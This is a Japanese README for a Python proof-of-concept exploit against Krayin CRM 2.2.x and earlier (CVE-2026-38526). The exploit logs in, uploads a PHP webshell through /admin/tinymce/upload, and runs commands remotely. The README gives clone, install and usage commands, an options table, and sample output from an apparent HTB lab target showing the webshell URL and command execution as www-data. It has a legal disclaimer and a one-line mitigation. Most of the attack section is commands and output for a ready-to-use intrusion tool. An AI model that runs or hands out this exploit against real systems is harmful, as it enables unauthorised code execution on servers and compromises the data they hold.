
Krayin CRM <= 2.2.x の CVE-2026-38526 を悪用する Python PoC: /admin/tinymce/upload を介した認証済み PHP webshell アップロードによりリモートコード実行に至る。
⚠️ 法的警告:このコードは教育目的 および許可されたテスト(CTF、バグバウンティ、プライベートラボ)専用として提供されています。 作者は違法な使用に対して責任を負いません。
Krayin CRM(Webkul)≤ 2.2.x はエンドポイント /admin/tinymce/upload
を公開しており、認証済みユーザー(低権限であっても)が
拡張子の検証なしにファイルをアップロードできます。ファイルは
その後 storage/ フォルダから配信され、PHPコードの
任意実行が可能になります。
git clone https://github.com/<TON_PSEUDO>/cve-2026-38526.git
cd cve-2026-38526
pip install -r requirements.txt
python3 cve-2026-38526.py -t http://target.tld -u [email protected] -p 'password' -c 'id'
オプション:
| オプション | 説明 |
|---|---|
-t, --target | ターゲットのルートURL |
-u, --user | Krayinアカウントのメールアドレス |
-p, --password | パスワード |
-c, --command | 実行するコマンド(デフォルト:id) |
--login-path | ログインパス(デフォルト:/admin/login) |
--upload-path | アップロードパス(デフォルト:/admin/tinymce/upload) |
--timeout | HTTPタイムアウト(デフォルト:15) |
$ python3 cve-2026-38526.py -t http://billing.nexus.htb \
-u [email protected] -p 'N27xh!!2ucY04' -c 'id'
[*] http://billing.nexus.htb/admin/login でCSRFトークンを取得中
[*] ログインフォームを送信中
[+] 認証に成功しました
[*] http://billing.nexus.htb/admin/tinymce/upload 経由で x8f2k1ab.php をアップロード中
[+] ウェブシェルにアクセス可能:http://billing.nexus.htb/storage/tinymce/x8f2k1ab.php
[*] 実行中:id
============================================================
[+] コマンド:id
============================================================
uid=33(www-data) gid=33(www-data) groups=33(www-data)
============================================================
storage/ および uploads/ フォルダ内でのPHP実行を禁止する。このプロジェクトはセキュリティ研究目的で公開されています。事前の書面による 許可なくシステムに対して使用することは 違法であり、固く禁止されています。